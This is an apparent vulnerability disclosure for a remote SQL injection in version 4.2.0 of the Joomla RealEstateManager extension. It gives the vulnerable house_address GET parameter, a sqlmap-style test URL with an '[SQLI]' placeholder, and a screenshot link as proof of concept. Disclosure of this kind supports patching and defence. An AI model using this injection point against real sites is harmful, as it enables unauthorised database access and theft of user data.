Joomla RealEstateManager extension version 4.2.0 suffers from a remote SQL injection vulnerability.
5c8066eaded80973d1e608671882abe2
################################################
#Title: Joomla RealEstateManager 4.2.0 - SQL injection
#Credit: Bilal KARDADOU
#Vendor: http://ordasoft.com/
#URL:
https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/realestatemanager/
#Product: 'Joomla RealEstateManager 4.2.0'
#Developer: OrdaSoft
#Extension type: Plugin
#Last updated: Dec 31 2017
#Compatibility: 3.X
#Google Dork: N/A
################################################
#
# Description:
# Real Estate Manager Basic is FREE version of real estate extension and
property management software for real estate listing websites built on
Joomla 3.x.
# Real Estate Manager allows real estate agencies, real estate brokers and
agents manage property listings,
# property categories, hotel booking, motel booking, amenities, booking and
buying requests and languages.
# With our property extension you can upload photo, manage real estate
categories and subcategories, display property on Google map, post comments
and more.
#
# --Method=GET -p [house_address]
#
# -u "
http://127.0.0.1/joomla/index.php/realestate/search-houses/search-by-map?house_address=a/'/[SQLI]&house_search_range=1000&house_search_latitude=48.3705449&house_search_longitude=10.897789999999986&house_cat=
"
#
# PoC:
# https://prnt.sc/hvidg3
#
#Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################